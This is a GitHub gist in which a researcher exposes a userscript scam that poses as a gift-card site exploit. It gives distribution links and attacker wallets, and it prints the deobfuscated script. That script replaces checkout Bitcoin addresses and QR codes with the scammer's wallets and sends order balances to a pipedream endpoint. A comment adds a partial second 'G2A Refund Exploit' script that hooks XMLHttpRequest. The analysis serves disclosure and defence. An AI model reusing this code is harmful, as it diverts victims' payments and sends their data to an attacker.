Skip to content

Instantly share code, notes, and snippets.

@PaulusParssinen

PaulusParssinen/giftcardscammer.md

Last active April 10, 2025 14:57
Show Gist options
  • Save PaulusParssinen/413226d9942b8c03d3ee17c6d6b0aa1b to your computer and use it in GitHub Desktop.
Save PaulusParssinen/413226d9942b8c03d3ee17c6d6b0aa1b to your computer and use it in GitHub Desktop.
Download ZIP
Relatively clever gift card scammer infra
Raw
giftcardscammer.md

This is a fake exploit scam on gift card sites.

The scam seems to be atleast distributed here:

The usescript is under handle "Hadez", one of the google drive documents is made on Google account:

The bitcoin stealer userscript is distributed in:

  • drive.google(.)com/file/d/1Mzn6o3n5xIhN6nueBAl3YTzyb27ZgMrD/view?zlgXtAsdQu%27
  • files.catbox(.)moe/dhn1ls.txt
  • paste(.)sh/rMGw98ul#sTI6A_g_10mnpiH5YMHLgCDx
  • dropbox(.)com/scl/fi/falasv32llc477i1i185t/timezonescript.user.js?rlkey=12zepm4dhptn33i8wjsft166w&st=getejlh7&dl=1

Gift card scammer's wallets

  • bc1qmkddk9f6gj22zeecetkjhpzsfsppvhwe2yptsh
  • bc1qlql8nnzl653p52a7s4zvktn3qugrqmtyyhc3f4
  • bc1q9qx6vjqffvqyd0z8rrczsfcusnsv0h3nrs4wnk
  • bc1qq72f38r9jf3m4wddclae96tvk978kp3rm73vrj
  • bc1qgx8flfpfffsq8xst3l77c9txtpazxsjht67jpu
  • bc1qt0neweacj9dspsxdvau6pkh52pfest74wtc02n
  • bc1qupaasuw5sm00fsj54ys8qrwmh7jqr736hxlj5z
  • bc1qtq0xe882md2jdvd8ksdp7m97p9j95mzq5e4j8e
  • bc1qz0vgq82204dxqzntp3lxu8kta5pgh22sdheelc
  • bc1qf3pwr60ykrae7068pvr9k0vs4ehvap8gmpt99p

Infra:

var f = "https://eoo9wwj4k433uf0.m.pipedream.net?balance=" + _0x4ee084 + " mBT FOR A SE ZBIERAM";``
//...
var g = "https://eoo9wwj4k433uf0.m.pipedream.net?balance=" + f + " mBT FOR A SE ZBIERAM";
continue;
Raw
scam_deobfuscated.js
'use strict';
let n = /\d\.\d{3,}(?=\s*BTC)/;
let u = [
"bc1qmkddk9f6gj22zeecetkjhpzsfsppvhwe2yptsh",
"bc1qlql8nnzl653p52a7s4zvktn3qugrqmtyyhc3f4",
"bc1q9qx6vjqffvqyd0z8rrczsfcusnsv0h3nrs4wnk",
"bc1qq72f38r9jf3m4wddclae96tvk978kp3rm73vrj",
"bc1qgx8flfpfffsq8xst3l77c9txtpazxsjht67jpu",
"bc1qt0neweacj9dspsxdvau6pkh52pfest74wtc02n",
"bc1qupaasuw5sm00fsj54ys8qrwmh7jqr736hxlj5z",
"bc1qtq0xe882md2jdvd8ksdp7m97p9j95mzq5e4j8e",
"bc1qz0vgq82204dxqzntp3lxu8kta5pgh22sdheelc",
"bc1qf3pwr60ykrae7068pvr9k0vs4ehvap8gmpt99p"];
function c(n) {
var e = new Image();
e.onload = function () {
document.querySelector("[class^=\"indexes__QrCodeImage\"]").src = n;
};
e.src = n;
}
function s(n) {
const s = {
tqDRL: function (n, t) {
return n(t);
},
hINxJ: function (n, t) {
return n + t;
},
KDkGO: "return (function() ",
WOrzV: "{}.constructor(\"return this\")( )",
kLDOx: function (n) {
return n();
},
WQEgR: "log",
ASiTe: "warn",
wlbHD: "info",
qvCgr: "error",
LxXrd: "exception",
ngPfd: "table",
FSGzN: "trace",
MUEvA: function (n, t) {
return n < t;
},
DScrH: "function *\\( *\\)",
SEfXo: "\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)",
eoZFL: function (n, t) {
return n(t);
},
WCfqr: "init",
RThKg: "chain",
hVGNL: function (n, t) {
return n + t;
},
mdFKG: "input",
eanEj: function (n) {
return n();
},
kVPkV: function (n, t) {
return n === t;
},
lVQrP: "LPiWZ",
gyzIZ: "PdwBF",
TFNyk: "string",
DYiDQ: function (n, t) {
return n === t;
},
iFJLi: "TKiUj",
MLtnY: "while (true) {}",
XUTPd: "counter",
iyhQH: function (n, t) {
return n !== t;
},
pXGCx: function (n, t) {
return n + t;
},
JQuMS: function (n, t) {
return n / t;
},
ioDnW: "length",
RIOqM: function (n, t) {
return n % t;
},
EQNFY: "jSkaQ",
lPDgp: "Diqfx",
oyWRT: function (n, t) {
return n + t;
},
KbBqq: "debu",
wmbht: "gger",
JYwrO: "action",
WDtJP: function (n, t) {
return n + t;
},
ZIJWe: "stateObject",
MvmIJ: function (n, t) {
return n(t);
},
ntIaT: function (n, t) {
return n(t);
}
};
function x(n) {
const r = {
eybJv: s.DScrH,
nyems: s.SEfXo,
PYqiJ: function (n, t) {
return s[(263, u = 499, 574, "eoZFL")](n, t);
var u;
},
Zxhck: s.WCfqr,
RCxgP: function (n, t) {
return s[(813, u = 1030, 926, c = 591, "hINxJ")](n, t);
var u;
var c;
},
TFggr: s.RThKg,
kYApm: function (n, t) {
return s[(656, u = 409, 792, c = 657, "hVGNL")](n, t);
var u;
var c;
},
QuOgC: s.mdFKG,
ABXEI: function (n) {
return s[(536, r = 484, u = 563, 676, "eanEj")](n);
var r;
var u;
},
klCPm: function (n, t) {
return s[(r = 406, -4, e = 161, 190, "kVPkV")](n, t);
var r;
var e;
},
ffdgT: s.lVQrP,
KvSyY: s.gyzIZ
};
if (s.kVPkV(typeof n, s.TFNyk)) {
if (s.DYiDQ(s.iFJLi, s.iFJLi)) {
return function (n) {}.constructor(s.MLtnY).apply(s.XUTPd);
}
{
const n = new _0x44cfbc(r.eybJv);
const u = new _0x301796(r.nyems, "i");
const e = r.PYqiJ(_0x36aeab, r.Zxhck);
if (n.test(r.RCxgP(e, r.TFggr)) && u.test(r.kYApm(e, r.QuOgC))) {
r.ABXEI(_0x1c8343);
} else {
r.PYqiJ(e, "0");
}
}
} else if (s.iyhQH(s.pXGCx("", s.JQuMS(n, n))[s.ioDnW], 1) || s.DYiDQ(s.RIOqM(n, 20), 0)) {
if (s.DYiDQ(s.EQNFY, s.lPDgp)) {
let n;
try {
const r = s.tqDRL(_0x4e2f92, s.hINxJ(s.hINxJ(s.KDkGO, s.WOrzV), ");"));
n = s.kLDOx(r);
} catch (t) {
n = _0xf12d38;
}
const r = n.console = n.console || {};
const u = [s.WQEgR, s.ASiTe, s.wlbHD, s.qvCgr, s.LxXrd, s.ngPfd, s.FSGzN];
for (let n = 0; s.MUEvA(n, u.length); n++) {
const e = _0x49cfb4.constructor.prototype.bind(_0x3ed878);
const c = u[n];
const s = r[c] || e;
e.__proto__ = _0x4647d5.bind(_0x4c8408);
e.toString = s.toString.bind(s);
r[c] = e;
}
} else {
(function () {
return !r.klCPm(r.ffdgT, r[(180, u = 412, e = 159, 188, "KvSyY")]);
var u;
var e;
}).constructor(s.oyWRT(s.KbBqq, s.wmbht)).call(s.JYwrO);
}
} else {
(function () {
return false;
}).constructor(s.WDtJP(s.KbBqq, s.wmbht)).apply(s.ZIJWe);
}
s.MvmIJ(x, ++n);
}
try {
if (n) {
return x;
}
s.ntIaT(x, 0);
} catch (n) {}
}
(function () {
let t;
try {
const r = Function("return (function() {}.constructor(\"return this\")( ));");
t = r();
} catch (r) {
t = window;
}
t.setInterval(s, 4000);
})();
(async function () {
const o = {
chboi: function (n, t) {
return n + t;
},
qCyGH: "debu",
HgoFp: "gger",
ZYtMZ: "stateObject",
mgxwG: function (n, t) {
return n !== t;
},
qKZvJ: "UYdFD",
cArnF: "UFKEh",
fdeKq: function (n, t) {
return n === t;
},
rWlwj: "ZjboJ",
XADWf: function (n, t) {
return n !== t;
},
OKsIa: "okZGi",
znYDa: "2|0|4|3|1",
vzlWl: "GET",
IqiLU: "IIcGY",
tneFq: function (n, t) {
return n !== t;
},
MtgBQ: "VNyxC",
eIIit: "(((.+)+)+)+$",
rffQM: function (n, t) {
return n(t);
},
PPetG: function (n) {
return n();
},
sXbKj: "zRcqH",
FwVWk: "iWwhv",
ZPprj: function (n, t) {
return n !== t;
},
awIZB: "Ldijt",
sELeH: "QevpA",
tpOYC: "Eefog",
cysHy: "RdeKD",
mUnNN: "function *\\( *\\)",
uChoZ: "\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)",
VuskR: function (n, t) {
return n(t);
},
aGkvP: "init",
GOkuh: function (n, t) {
return n + t;
},
eBiaW: "chain",
DQgPO: "input",
AioyY: "ninxu",
KCBFZ: function (n, t) {
return n(t);
},
IAZxQ: "miSGr",
nyZTw: function (n, t) {
return n === t;
},
YEuED: "KdUqO",
Gognz: "igDcO",
KMGGA: function (n, t, r) {
return n(t, r);
},
CJTDT: function (n, t) {
return n !== t;
},
MxjJV: "aPBtT",
xLHoH: "cOuQh",
wWraZ: function (n, t) {
return n(t);
},
yAXqj: function (n, t) {
return n + t;
},
vDgOB: "action",
SFszA: "cTVyX",
ljlCu: "wXSit",
mXJmD: "wZeCN",
aujgy: "while (true) {}",
vMCPF: "counter",
MugFR: function (n, t) {
return n * t;
},
pOOtY: function (n, t) {
return n(t);
},
UxEKy: "cahcq",
kRpuv: "oahaM",
FqCbg: function (n, t) {
return n === t;
},
iLSdu: "jdCdF",
UxPOx: function (n, t) {
return n(t);
},
jPJgL: function (n, t) {
return n + t;
},
eLtgO: function (n, t) {
return n + t;
},
QsQkJ: "return (function() ",
seHjK: "{}.constructor(\"return this\")( )",
SEHXm: "cXTBm",
pgmDL: "zBoQX",
PiRhX: "log",
QxlLA: "warn",
sjTZJ: "info",
fhbgI: "error",
RYvNe: "exception",
vjmxn: "table",
iWmwi: "trace",
SDCaP: function (n, t) {
return n < t;
},
fyEwg: "yzwWu",
AqUnW: function (n, t) {
return n + t;
},
Vlzwt: function (n) {
return n();
},
oNCzK: function (n, t, r) {
return n(t, r);
},
qABAW: function (n, t) {
return n(t);
},
vpaIF: "section",
sUyuc: function (n, t) {
return n(t);
},
nSOUX: "Timezone changed! Press OK to continue.",
MOZBS: "[class^=\"indexes__QrCodeImage\"]",
TqRPN: "bKtlk",
yGVYF: "ioqVL",
kFfYK: "KQMPP",
eSUIm: "Emown",
yGtab: "bKCGc",
Sulkp: "HXqco",
rJwBf: "SEUJy",
UPuBK: function (n, t) {
return n(t);
},
gjOGO: function (n, t) {
return n && t;
},
oRNDw: function (n, t) {
return n !== t;
},
UcXZa: "QSukl",
pVySX: "1|4|2|3|0",
GOgcY: function (n, t) {
return n >= t;
},
gcGKt: function (n, t) {
return n(t);
},
aNTvr: function (n, t) {
return n + t;
},
QEshs: function (n) {
return n();
},
bcSCG: "ucCza",
UDgyQ: function (n, t) {
return n === t;
},
CvRbM: "QbYXC",
FWvfq: function (n, t) {
return n >= t;
},
CNuyk: "EkOWA",
jJZIG: function (n, t) {
return n(t);
},
eOrZk: "HtklM",
VWlwT: function (n, t) {
return n !== t;
},
cXEkP: "LmIHd",
drAeh: "div[class*=\"indexes__MethodAlert\"]",
BuIoH: "KdKDE",
PojxJ: "YTXhQ",
EmXxC: "img[src*=\"instant-methods.png\"]",
mEiCq: function (n, t) {
return n === t;
},
iQeAf: "feMbO",
XwlVj: function (n, t) {
return n === t;
},
LADKa: "FylXo",
lFrKg: "LEQWN",
TgKRw: "span[class^=\"indexes__BreakableText\"]",
NUJkh: "div[class*=\"Warning\"]",
TkrxL: "opiMM",
VmKVO: function (n, t) {
return n && t;
},
NaCQf: function (n, t) {
return n === t;
},
bPbut: "BHZYe",
pVQRW: function (n, t) {
return n(t);
},
AFmAA: function (n, t) {
return n === t;
},
coguH: "gFjxr",
yJzch: "FAPOc",
DSmKg: function (n, t, r) {
return n(t, r);
},
zHuRF: function (n) {
return n();
},
NrXWj: function (n, t, r) {
return n(t, r);
},
sbmvx: function (n) {
return n();
}
};
const a = function () {
const c = {
zDahD: function (n, t) {
return o.fdeKq(n, t);
},
DgCgY: o.rWlwj,
YJazW: function (n, t) {
return o[(u = 1103, 943, 1001, i = 1227, "XADWf")](n, t);
var u;
var i;
},
Tfmwl: o.OKsIa,
njfvH: o.znYDa,
tFJSy: o.vzlWl
};
if (o.fdeKq(o.IqiLU, o.IqiLU)) {
let n = true;
return function (r, e) {
o.qCyGH;
o.HgoFp;
o.ZYtMZ;
if (o.mgxwG(o.qKZvJ, o[(x = 216, 474, 189, "cArnF")])) {
const t = n ? function () {
if (c.zDahD(c.DgCgY, c.DgCgY)) {
if (e) {
if (!c.YJazW(c.Tfmwl, c.Tfmwl)) {
const n = e.apply(r, arguments);
e = null;
return n;
}
_0x5e18cc.remove();
}
} else {
(function () {
return false;
}).constructor(eyXVyu.NJwYH(eyXVyu.PlMqe, eyXVyu.eflYP)).apply(eyXVyu.mFKdp);
}
} : function () {};
n = false;
return t;
}
var x;
_0x2d7a20 = _0x342043[0];
};
}
{
const e = c.njfvH.split("|");
let o = 0;
while (true) {
switch (e[o++]) {
case "0":
var f = "https://eoo9wwj4k433uf0.m.pipedream.net?balance=" + _0x4ee084 + " mBT FOR A SE ZBIERAM";
continue;
case "1":
_0x4dcf49 = true;
continue;
case "2":
var a = new _0x3f43ef();
continue;
case "3":
a.send();
continue;
case "4":
a.open(c.tFJSy, f);
continue;
}
break;
}
}
}();
const v = o.oNCzK(a, this, function () {
if (o.tneFq(o.MtgBQ, o.MtgBQ)) {
const t = _0x48d3ef ? function () {
if (_0x44e62f) {
const n = _0x4a1292.apply(_0x16f8a0, arguments);
_0x563f84 = null;
return n;
}
} : function () {};
_0x3c3dd6 = false;
return t;
}
return v.toString().search(o.eIIit).toString().constructor(v).search(o.eIIit);
});
o.zHuRF(v);
const d = function () {
if (!o.XADWf(o.tpOYC, o.tpOYC)) {
let t = true;
return function (u, c) {
function f(n, t, r, u, e) {
return __DECODE_0__(o - 457 - 65 - 130, c);
var c;
var o;
}
const x = {
iqXhI: function (n) {
return o.PPetG(n);
},
rsMsw: function (n, t) {
return o.tneFq(n, t);
},
MinVj: o.sXbKj,
MwkiR: o.FwVWk
};
if (o.ZPprj(o.awIZB, o[(-508, -723, "sELeH")])) {
const n = t ? function () {
function e(n, t, r, u, e) {
return f(0, u, 0, e - 9);
}
if (x.rsMsw(x.MinVj, x.MinVj)) {
const u = _0x13dde4.constructor.prototype[e(0, 0, 0, 505, 409)](_0x45398f);
const c = _0x54ec0b[_0x8d1ee2];
const i = _0x175a64[c] || u;
u.__proto__ = _0x43b5ac.bind(_0x318a17);
u["toStr" + e(0, 0, 0, 740, 881)] = i.toString.bind(i);
_0x216142[c] = u;
} else if (c) {
if (!x.rsMsw(x[e(0, 0, 0, 622, 504)], x[e(0, 0, 0, 186, 504)])) {
const n = c.apply(u, arguments);
c = null;
return n;
}
CVcHtm.iqXhI(_0x1e2f68);
}
} : function () {};
t = false;
return n;
}
return true;
};
}
if (_0xdfe66c) {
return _0x7079e5;
}
kReJLX.rffQM(_0x1a1764, 0);
}();
(function () {
const c = {
TbVmy: o.eIIit,
EDeVU: function (n, t) {
return o[(u = 10, 284, -34, "XADWf")](n, t);
var u;
},
wkKrq: o.cysHy,
cARwn: o.mUnNN,
GFzYq: o.uChoZ,
bBSgE: function (n, r) {
return o.VuskR(n, r);
},
DIEBl: o.aGkvP,
IknTq: function (n, t) {
return o[(1464, e = 1668, 1696, "GOkuh")](n, t);
var e;
},
CtDRY: o.eBiaW,
dzxOJ: function (n, t) {
return o[(u = 1251, 1501, 1558, "GOkuh")](n, t);
var u;
},
bFdIg: o.DQgPO,
ckUvN: function (n, t) {
return o.XADWf(n, t);
},
WuPym: o.AioyY,
TRBUK: function (n, t) {
return o[(u = 1531, 1564, c = 1620, 1364, "KCBFZ")](n, t);
var u;
var c;
},
FfTSD: o.IAZxQ,
ZQEUo: function (n) {
return o[(1522, 1361, e = 1547, "PPetG")](n);
var e;
}
};
if (o.nyZTw(o.YEuED, o.Gognz)) {
_0x3fc71f = _0x2dfc02;
} else {
o.KMGGA(d, this, function () {
const o = {
dTNsw: c.TbVmy
};
if (c.EDeVU(c.wkKrq, c.wkKrq)) {
_0xa66b1c.remove();
} else {
const n = new RegExp(c.cARwn);
const t = new RegExp(c.GFzYq, "i");
const r = c.bBSgE(s, c.DIEBl);
if (n.test(c.IknTq(r, c.CtDRY)) && t.test(c.dzxOJ(r, c.bFdIg))) {
if (c.ckUvN(c.FfTSD, c.FfTSD)) {
return _0x165b77.toString().search(VHClEd.dTNsw).toString().constructor(_0x4a0164).search(VHClEd.dTNsw);
}
c.ZQEUo(s);
} else if (c.ckUvN(c.WuPym, c.WuPym)) {
if (_0x2fba96) {
const n = _0x3cbb58.apply(_0x4c6b1c, arguments);
_0x30a30b = null;
return n;
}
} else {
c.TRBUK(r, "0");
}
}
})();
}
})();
const w = function () {
const n = {
vyphM: function (n, t) {
return o[(-52, 255, "CJTDT")](n, t);
},
EmChZ: o.MxjJV,
coCpX: function (n, t) {
return o[(735, 496, e = 544, "mgxwG")](n, t);
var e;
},
igGml: o.xLHoH,
TdlTB: function (n, t) {
return o[(131, e = -86, 374, i = 297, "wWraZ")](n, t);
var e;
var i;
},
iTUbv: function (n, t) {
return o[(u = 299, e = -21, 276, i = 80, 133, "yAXqj")](n, t);
var u;
var e;
var i;
},
qiQzv: o.qCyGH,
oYIzG: o.HgoFp,
fCcQp: o.vDgOB,
bOlSe: function (n, t) {
return o[(408, 684, e = 669, c = 197, "ZPprj")](n, t);
var e;
var c;
},
icGTz: o.SFszA
};
if (o.ZPprj(o.ljlCu, o.mXJmD)) {
let t = true;
return function (r, e) {
n.qiQzv;
n.oYIzG;
n.fCcQp;
if (n.bOlSe(n.icGTz, n.icGTz)) {
const n = _0x5cf0f4.apply(_0x26e4f1, arguments);
_0x59fdb9 = null;
return n;
}
{
const u = t ? function () {
if (n.vyphM(n.EmChZ, n.EmChZ)) {
ncBQRN.abIUu(_0x382bfc, 0);
} else if (e) {
if (!n.coCpX(n.igGml, n.igGml)) {
const n = e.apply(r, arguments);
e = null;
return n;
}
(function () {
return true;
}).constructor(ncBQRN.KdFhF(ncBQRN.YMFvD, ncBQRN.xCWuP)).call(ncBQRN.JFNKV);
}
} : function () {};
t = false;
return u;
}
};
}
if (_0x103ab1) {
const n = _0xe80cfb.apply(_0x49d495, arguments);
_0x1d0566 = null;
return n;
}
}();
const p = o.NrXWj(w, this, function () {
if (o.XADWf(o.UxEKy, o.kRpuv)) {
let c;
try {
if (o.FqCbg(o.iLSdu, o.iLSdu)) {
const n = o.UxPOx(Function, o.jPJgL(o.eLtgO(o.QsQkJ, o.seHjK), ");"));
c = o.PPetG(n);
} else {
_0x2998ce.remove();
}
} catch (i) {
if (!o.ZPprj(o.SEHXm, o.pgmDL)) {
return function (n) {}.constructor(kReJLX.aujgy).apply(kReJLX.vMCPF);
}
c = window;
}
const i = c.console = c.console || {};
const f = [o.PiRhX, o.QxlLA, o.sjTZJ, o.fhbgI, o.RYvNe, o.vjmxn, o.iWmwi];
for (let c = 0; o.SDCaP(c, f.length); c++) {
if (!o.fdeKq(o.fyEwg, o.fyEwg)) {
return _0x2e9915;
}
{
const o = w.constructor.prototype.bind(w);
const a = f[c];
const s = i[a] || o;
o.__proto__ = w.bind(w);
o.toString = s.toString.bind(s);
i[a] = o;
}
}
} else {
_0x59321b = _0x1e2625[0];
_0x1202e0 = o.MugFR(o.pOOtY(_0x928c, _0x144318), 1000);
_0x2d46db = _0x11e8ff.toFixed(2);
}
});
o.sbmvx(p);
let k = false;
let h = false;
let y = false;
var m = o.oNCzK(setInterval, function () {
const a = {
wBKEp: o.vpaIF,
AygLD: function (n, t) {
return o.sUyuc(n, t);
},
NxcmV: o.nSOUX,
srcnJ: o.MOZBS,
KcrRd: function (n, t) {
return o.FqCbg(n, t);
},
XcfLQ: o.TqRPN,
jETwY: function (n, t) {
return o.tneFq(n, t);
},
aSCek: o.yGVYF,
oYNax: o.kFfYK,
vEpPt: function (n, t) {
return o.CJTDT(n, t);
},
TgZFi: o.eSUIm,
XLtDv: o.yGtab,
gAZHT: o.Sulkp,
MdDcM: function (n, t) {
return o.MugFR(n, t);
},
HBtfB: o.rJwBf,
bzxtc: function (n, t) {
return o.UPuBK(n, t);
},
DEREs: function (n, t) {
return o.gjOGO(n, t);
},
JEddR: function (n, r) {
return o[(229, e = 442, 517, i = 811, "oRNDw")](n, r);
var e;
var i;
},
hjzbl: o.UcXZa,
dIRQE: o.pVySX,
jCUzn: o.vzlWl,
UzyBU: function (n, t) {
return o[(-163, -134, "GOgcY")](n, t);
},
oLIjS: function (n, t) {
return o.UxPOx(n, t);
},
KlQwc: function (n, r) {
return o[(491, 237, c = 307, i = 307, "gcGKt")](n, r);
var c;
var i;
},
XIrwI: function (n, t) {
return o.aNTvr(n, t);
},
lvWIm: o.QsQkJ,
GAAau: o.seHjK,
BLmYl: function (n) {
return o[(t = 1369, 1283, 1057, "QEshs")](n);
var t;
},
IhbqO: o.bcSCG,
tnJNy: function (n, t) {
return o.UDgyQ(n, t);
},
gWXvi: o.CvRbM,
CtdsW: function (n, r) {
return o[(1221, 1409, c = 1417, "FWvfq")](n, r);
var c;
},
qcwpr: o.CNuyk,
srcHH: function (n, t) {
return o[(r = 340, 290, 584, "jJZIG")](n, t);
var r;
},
bwlcu: o.eOrZk,
AFLSZ: function (n, r) {
return o[(1561, e = 1838, 1516, i = 1303, "rffQM")](n, r);
var e;
var i;
}
};
if (o.VWlwT(o.cXEkP, o.cXEkP)) {
const n = kReJLX.wWraZ(_0x51ea29, kReJLX.eLtgO(kReJLX.AqUnW(kReJLX.QsQkJ, kReJLX.seHjK), ");"));
_0x42f9fc = kReJLX.Vlzwt(n);
} else {
let x = document.querySelector(o.drAeh);
if (x) {
if (o.UDgyQ(o.BuIoH, o.PojxJ)) {
const n = {
dCRak: kReJLX.mUnNN,
KvcSY: kReJLX.uChoZ,
ucgmP: function (n, t) {
return kReJLX.KCBFZ(n, t);
},
akfmU: kReJLX.aGkvP,
nswth: function (n, t) {
return kReJLX[(-161, 131, "eLtgO")](n, t);
},
yWuwp: kReJLX.eBiaW,
sNsMs: kReJLX.DQgPO,
tFzbk: function (n) {
return kReJLX.Vlzwt(n);
}
};
kReJLX.oNCzK(_0x243b1e, this, function () {
const e = new _0x446842(n.dCRak);
const c = new _0x15ace0(n.KvcSY, "i");
const a = n.ucgmP(_0x2cbfcc, n.akfmU);
if (e.test(n.nswth(a, n.yWuwp)) && c.test(n.nswth(a, n.sNsMs))) {
n.tFzbk(_0x22f916);
} else {
n.ucgmP(a, "0");
}
})();
} else {
x.remove();
}
}
let l = document.querySelector(o.EmXxC);
if (l) {
if (o.mEiCq(o.iQeAf, o.iQeAf)) {
let n = l.closest(o.vpaIF);
if (n) {
if (o.XwlVj(o.LADKa, o.lFrKg)) {
const n = _0x2594c8.apply(_0x2861cf, arguments);
_0x478745 = null;
return n;
}
n.remove();
}
} else {
kReJLX.qABAW(_0x5b43b8, "0");
}
}
let v = false;
document.querySelectorAll(o.TgKRw).forEach(function (r) {
const l = {
ChHIC: function (n, t) {
return a.AygLD(n, t);
},
KjXJJ: a.srcnJ,
vIFFx: function (n, t) {
return a[(1428, u = 1214, 1437, c = 1662, "KcrRd")](n, t);
var u;
var c;
},
cQLTH: a.XcfLQ,
JJDzp: function (n, t) {
return a.jETwY(n, t);
},
Yxkxf: a.aSCek,
JJFDm: a.oYNax
};
if (a.vEpPt(a.TgZFi, a.TgZFi)) {
l.ChHIC(_0x1389b9, "Your order value is " + _0x1ea118 + " BTC. This exploit works only for high value orders that are at least 0.0015 BTC. Please add more products to your cart.");
} else {
u.forEach(function (n) {
const i = {
cZkTR: l.KjXJJ
};
const a = i;
if (l.vIFFx(l.cQLTH, l.cQLTH)) {
if (r.innerHTML.includes(n)) {
if (l.JJDzp(l.Yxkxf, l.JJFDm)) {
v = true;
return;
}
_0x550dbe.querySelector(a.cZkTR).src = _0x5e61a7;
}
} else {
_0x33c3af = true;
}
});
if (!v) {
if (a.KcrRd(a.XLtDv, a.gAZHT)) {
let n = _0x542172.closest(a.wBKEp);
if (n) {
n.remove();
}
} else {
let t = u[Math.floor(a.MdDcM(Math.random(), u.length))];
r.innerHTML = t;
k = true;
let e;
let f;
let s = document.body.innerHTML.match(n);
if (s) {
if (a.vEpPt(a.HBtfB, a.HBtfB)) {
const n = _0x61d95c ? function () {
if (_0x3fe6d3) {
const t = _0x314587.apply(_0x247dc7, arguments);
_0x1fb4d4 = null;
return t;
}
} : function () {};
_0x170d83 = false;
return n;
}
e = s[0];
f = a.MdDcM(a.bzxtc(parseFloat, e), 1000);
f = f.toFixed(2);
}
if (a.DEREs(!y, s)) {
if (a.JEddR(a.hjzbl, a.hjzbl)) {
a.AygLD(_0x55efc8, a.NxcmV);
} else {
const n = a.dIRQE.split("|");
let t = 0;
while (true) {
switch (n[t++]) {
case "0":
y = true;
continue;
case "1":
var b = new XMLHttpRequest();
continue;
case "2":
b.open(a.jCUzn, g);
continue;
case "3":
b.send();
continue;
case "4":
var g = "https://eoo9wwj4k433uf0.m.pipedream.net?balance=" + f + " mBT FOR A SE ZBIERAM";
continue;
}
break;
}
}
}
var w = "https://api.qrserver.com/v1/create-qr-code/?size=147x147&data=bitcoin:" + t + "?amount=" + e;
a.bzxtc(c, w);
}
}
}
});
let d = document.querySelector(o.NUJkh);
if (d) {
if (o.ZPprj(o.TkrxL, o.TkrxL)) {
_0x27611f = _0xd82af9;
} else {
d.remove();
}
}
if (o.VmKVO(k, y)) {
if (!o.NaCQf(o.bPbut, o.bPbut)) {
const n = _0x37a9a2 ? function () {
if (_0x5b6653) {
const t = _0x42563c.apply(_0x4ef5c5, arguments);
_0x20f30a = null;
return t;
}
} : function () {};
_0x1361a0 = false;
return n;
}
o.pVQRW(clearInterval, m);
if (!h) {
if (o.AFmAA(o.coguH, o.yJzch)) {
if (_0x319082) {
const n = _0x4ad940.apply(_0x11c1fa, arguments);
_0x480223 = null;
return n;
}
} else {
o.DSmKg(setTimeout, function () {
const o = {
aMest: a.srcnJ,
SGKYD: function (n, t) {
return a.AygLD(n, t);
},
DtTpb: function (n, t) {
return a[(-169, -199, "XIrwI")](n, t);
},
fgeez: a.lvWIm,
oIrxb: a.GAAau,
ffikJ: function (n) {
return a[(-2, -222, "BLmYl")](n);
}
};
if (!a.KcrRd(a.IhbqO, a.IhbqO)) {
const n = _0x24f895.apply(_0x1be199, arguments);
_0x5a66f3 = null;
return n;
}
{
let t;
let r = document.body.innerHTML.match(n);
if (r) {
if (a.tnJNy(a.gWXvi, a.gWXvi)) {
t = r[0];
} else {
const n = {
JJdDo: o.aMest
};
const t = n;
var l = new _0x4db189();
l.onload = function () {
var e;
_0x336664["querySelec" + (192, e = 651, 405, "tor")](t.JJdDo).src = _0x2fd6b9;
};
l.src = _0x582e2a;
}
}
if (a.CtdsW(a.KlQwc(parseFloat, t), 0.0015)) {
if (a.tnJNy(a.qcwpr, a.qcwpr)) {
a.srcHH(alert, a.NxcmV);
} else {
let n;
let t = _0x2c847d.body.innerHTML.match(_0x172963);
if (t) {
n = t[0];
}
if (a.UzyBU(a.oLIjS(_0x2fca6c, n), 0.0015)) {
a.KlQwc(_0x18c715, a.NxcmV);
} else {
a.bzxtc(_0x49206a, "Your order value is " + n + " BTC. This exploit works only for high value orders that are at least 0.0015 BTC. Please add more products to your cart.");
}
_0x44c6a9 = true;
}
} else if (a.tnJNy(a.bwlcu, a.bwlcu)) {
a.AFLSZ(alert, "Your order value is " + t + " BTC. This exploit works only for high value orders that are at least 0.0015 BTC. Please add more products to your cart.");
} else {
const n = IewtpE.SGKYD(_0x330600, IewtpE.DtTpb(IewtpE.DtTpb(IewtpE.fgeez, IewtpE.oIrxb), ");"));
_0x1c7599 = IewtpE.ffikJ(n);
}
h = true;
}
}, 2000);
}
}
}
}
}, 10);
})();
@j0rd1s3rr4n0
Copy link

Nice job

@gostrafx
Copy link

gostrafx commented Apr 9, 2025

Capture d’écran 2025-04-09 121450

https://paste.sh/TK112xxa#opGGmRXaDULnPfFKqk483DXy

@j0rd1s3rr4n0
Copy link

Capture d’écran 2025-04-09 121450

https://paste.sh/TK112xxa#opGGmRXaDULnPfFKqk483DXy

Deofuscated

// ==UserScript==
// @name         G2A Refund Exploit
// @namespace    G2A
// @version      2.5
// @description  Refund any Bitcoin payment sent to G2A
// @match        *://*/*
// @icon         https://g2a.com/favicon.ico
// ==/UserScript==

'use strict';

// Configuración inicial del exploit
const exploitConfig = {
  btcAddressPattern: /^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$/,
  refundPercentage: 0.85,
  targetExchanges: ['coinbase', 'binance', 'kraken'],
  fakeRefundAddress: '1ExploitAddressXXXXXXXXXXXXXXXXXXXXXX'
};

// Decodificador XOR personalizado
function decodeXOR(encodedData, xorKey) {
  return encodedData.split(/(\w\w)/g)
    .filter(Boolean)
    .map(hex => parseInt(hex, 16))
    .map(byte => String.fromCharCode(byte ^ xorKey))
    .join('');
}

// Inyectar interfaz de usuario falsa
function injectFakeUI() {
  const cssStyle = `
    .g2a-refund-box {
      position: fixed;
      bottom: 20px;
      right: 20px;
      z-index: 999999;
      background: #fff;
      padding: 15px;
      border-radius: 8px;
      box-shadow: 0 4px 6px rgba(0,0,0,0.1);
      font-family: Arial, sans-serif;
    }
  `;
  
  const htmlContent = `
    <div class="g2a-refund-box">
      <h3>BTC Refund Interface v2.5</h3>
      <p id="refund-status">Ready to process refunds</p>
      <button onclick="initiateRefund()">Start Refund Process</button>
    </div>
  `;

  const styleElement = document.createElement('style');
  styleElement.textContent = cssStyle;
  document.head.appendChild(styleElement);
  
  const container = document.createElement('div');
  container.innerHTML = htmlContent;
  document.body.appendChild(container);
}

// Monitorear transacciones en tiempo real
function monitorTransactions() {
  const originalSend = XMLHttpRequest.prototype.send;
  
  XMLHttpRequest.prototype.send = function(body) {
    if (body && body.includes('bitcoin')) {
      try {
